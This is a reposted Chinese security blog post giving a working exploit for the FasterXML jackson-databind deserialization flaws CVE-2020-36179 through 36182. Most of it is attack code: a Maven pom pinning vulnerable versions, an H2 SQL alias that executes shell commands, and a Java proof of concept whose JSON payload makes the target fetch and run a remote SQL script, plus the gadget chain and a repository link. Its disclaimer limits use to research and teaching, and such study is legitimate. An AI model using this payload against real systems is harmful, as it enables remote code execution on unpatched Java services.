CVE-2020-36179 FasterXML jackson EXP

admin
admin
admin
140350
文章
117
评论
2021年1月11日02:18:27评论18 views字数 2885阅读9分37秒阅读模式

 

描述

            CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x错误处理了序列化小工具和键入之间的交互,与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS有关。

            CVE-2020-36180:2.9.10.8之前的FasterXML jackson-databind 2.x处理与org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。

            CVE-2020-36181:2.9.10.8之前的FasterXML jackson-databind 2.x处理与org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。

            CVE-2020-36182:2.9.10.8之前的FasterXML jackson-databind 2.x处理与org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。

 

如何RCE

            由于上述四个CVE安全漏洞是通过类似的方式触发的,因此在这里我们仅以CVE-2020-36180为例:

pom.xml

<?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0"         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">    <modelVersion>4.0.0</modelVersion>
    <groupId>com.jacksonTest</groupId>    <artifactId>jacksonTest</artifactId>    <version>1.0-SNAPSHOT</version>    <dependencies>        <dependency>            <groupId>com.fasterxml.jackson.core</groupId>            <artifactId>jackson-databind</artifactId>            <version>2.9.10.7</version>        </dependency>        <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-dbcp2 -->        <dependency>            <groupId>org.apache.commons</groupId>            <artifactId>commons-dbcp2</artifactId>            <version>2.8.0</version>        </dependency>        <!-- https://mvnrepository.com/artifact/com.h2database/h2 -->        <dependency>            <groupId>com.h2database</groupId>            <artifactId>h2</artifactId>            <version>1.4.199</version>        </dependency>
        <dependency>            <groupId>org.slf4j</groupId>            <artifactId>slf4j-nop</artifactId>            <version>1.7.2</version>        </dependency>        <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->        <dependency>            <groupId>javax.transaction</groupId>            <artifactId>jta</artifactId>            <version>1.1</version>        </dependency>    </dependencies></project>

exec.sql:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A");        return s.hasNext() ? s.next() : "";  }$$;CALL SHELLEXEC('calc.exe')


poc.java:

import com.fasterxml.jackson.databind.ObjectMapper;import com.fasterxml.jackson.databind.SerializationFeature;

public class POC {    public static void main(String[] args) throws Exception {        String payload = "["org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:3333/exec.sql'"}]";        ObjectMapper mapper = new ObjectMapper();        mapper.enableDefaultTyping();        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);        Object obj = mapper.readValue(payload, Object.class);        mapper.writeValueAsString(obj);    }}

CVE-2020-36179 FasterXML jackson EXP

 

小工具:

DriverAdapterCPDS    ->seturl        ->getPooledConnection            ->DirverManager.getConnection(this.url,username,pass)

 

项目地址:

https://github.com/Al1ex/CVE-2020-36179

本文始发于微信公众号(Khan安全攻防实验室):CVE-2020-36179 FasterXML jackson EXP

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月11日02:18:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-36179 FasterXML jackson EXPhttps://cn-sec.com/archives/535103.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息